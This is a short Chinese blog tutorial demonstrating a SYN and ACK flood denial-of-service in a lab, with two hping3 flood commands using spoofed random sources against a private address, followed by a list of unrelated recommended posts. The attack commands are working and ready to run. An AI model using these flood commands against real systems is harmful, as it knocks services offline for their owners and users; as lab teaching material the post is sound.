DDOS直接攻击系统资源

0。0;2023-10-24 1:08

DDOS ------直接攻击系统资源

思路:

攻击机利用三次握手机制,产生大量半连接,挤占受害者系统资源,使其无法正常提供服务。

1、先体验下受害者的正常网速。在受害者主机上执行以下命令

(1)开启Apache。
systemctl start apache2

(2) 下载百度首页代码。发现近乎瞬间完成。
curl baidu.com

2、在攻击机上执行以下代码,发起syn flood和ack flood。

bash 复制代码 
hping3  --flood  --rand-source  -S  -p 80 192.168.237.133
hping3  --flood  --rand-source  -A  -p 80 192.168.237.133

3、在受害机上观察

(1)输入netstat -ant,可以看到很多的半链接

(2)尝试再次请求百度首页代码。
curl baidu.com

发现系统资源被挤占,久久得不到回复。

相关推荐
Tim风声(网络工程师)29 分钟前
排查内网互联网访问流程
运维·服务器·网络
坚持就完事了1 小时前
Linux中如何添加环境变量
linux·运维·服务器
AC赳赳老秦2 小时前
政企内网落地:OpenClaw 离线环境深度适配方案,无外网场景下本地化模型对接与全功能使用
java·大数据·运维·python·自动化·deepseek·openclaw
l1t2 小时前
mingw和Linux中的gcc和llvm编译器编译的pocketpy执行同一个python脚本的不同效果
linux·运维·python
ITyunwei09873 小时前
团队管理与人才发展:如何打造一支“召之即来,来之能战”的铁军?
大数据·运维·人工智能
白緢3 小时前
一、Linux 基础入门
linux·运维·服务器
Deepoch3 小时前
面向工业现场自主运维:Deepoc 具身模型开发板的端侧智能升级路径
运维·人工智能·科技·巡检机器人·deepoc
菜菜艾3 小时前
自动化环境补丁更新系统
linux·运维·bash·运维开发
江上清风山间明月3 小时前
Nginx基于域名区分的多网站部署
运维·nginx·部署·php·多个网站
团象科技4 小时前
2026出海趋势观察:国际云服务器推荐重构企业全球化经营底盘
运维·服务器·重构
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03零基础教你claude code 接入 deepseek V404要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法05CC-Switch & Claude 基于 Linux 服务器安装使用指南06Dirtyfrag漏洞:我花了一下午搞清楚这个Linux内核提权漏洞到底在搞什么07Windows端Codex接入第三方模型(DeekSeek,BaiLian)08【AI】2026 年具身智能模型和世界模型总结09裂开!ChatGPT 居然开始要手机号验证,附详细解决方法10Linux 核弹级高危漏洞 CVE-2026-31431 完整修复指南